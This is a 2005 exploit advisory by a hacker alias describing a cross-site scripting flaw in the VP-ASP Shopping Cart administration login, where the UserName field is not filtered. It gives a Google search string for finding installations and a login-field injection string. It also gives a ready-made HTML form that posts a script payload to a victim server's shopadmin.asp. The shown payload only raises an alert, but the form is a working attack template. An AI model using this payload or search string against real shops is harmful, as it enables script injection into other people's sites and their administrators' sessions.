===========================================================================================================

VP-ASP Shopping Cart Cross Scripting vulnérability

===========================================================================================================
17/11/2005

#Author : ConcorDHacK
#WebSite : www.hackzord-security.fr.tc
#Product: VP-ASP Shopping Cart
#Source : http://membres.lycos.fr/newnst/exploit/VPASP Shopping_By_ConcorDHacK.txt
#Google search : "Copyright 1999-2004 Virtual Programming Pty Ltd. All rights reserved."

#Description : "A comprehensive e-commerce solution for both Windows and Unix.
Features include the  ability to add an  unlimited number of products, and a 
search facility. You can also add text and graphics for products.
VP-ASP Shopping Cart comes with international language support"


#Vulnerability :

The problem results from an error present in the part of autentification 
(/shopadmin.asp) which does  not  filter  correctly variable "UserName", 
which could be exploited  in order to inject malicious a HTML/Javascript  
code  of  the with dimensions customer.

#Proof of concepte :

Insert in the part of autentification Administration (/shopadmin.asp) :
Login : ">[Code Javascript]
Password : [Anything]

#Test :
__________________________________________________________________
/|\ Use: Fill the forms,then type your code HTML or Javascript./|\ 
\|/This code will be only to test the vulnerability on the     \|/
/|\vulnerable server. 					       /|\
\|/____________________________________________________________\|/

<HTML>
<br><br><center>
<body bgcolor="#000000">
<font color="red"><br>
<B><I><LI>To click on the boutton above for the test</B></I><br>

<! Do not forget to modify [VICTIME] by the name of the server which uses VP-ASP Shopping Cart and [PATH] 
by the path of the site. !>

<TITLE>VP-ASP Shopping UserName HTML Injection Vulnerability</TITLE>
<form action=http://[VICTIME]/[PATH]/shopadmin.asp name=LoginForm method=POST>
<input type=hidden name=UserName value='"><script>alert("Vulnerable server!!! 
By ConcorDHacK")</script>
<b><font color="red" size="10">Vulnerable server<br>By ConcorDHacK@gmail.com> 
</font> </b>' /> <input  type=hidden  name=Password size="20" value="123"></td>
<input type=submit name="Login" value="GO ! GO !"><br><br><br>By ConcorDHacK<br>
<u>Email</u>: ConcorDHacK@gmail.com<br>
<a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a>
</form>
</body>
</HTML>


#########################################################################################################
#Name : Lakhal | #Firstname : Faiçal | #Pseudo : ConcorDHacK 					        #
#Site : www.hackzord-security.fr.tc 									#
#E-mail : ConcorDHacK@gmail.com                                                                         #
#Original Exploit : http://membres.lycos.fr/newnst/exploit/VPASP Shopping_By_ConcorDHacK.txt            #
#########################################################################################################
=========================================================================================================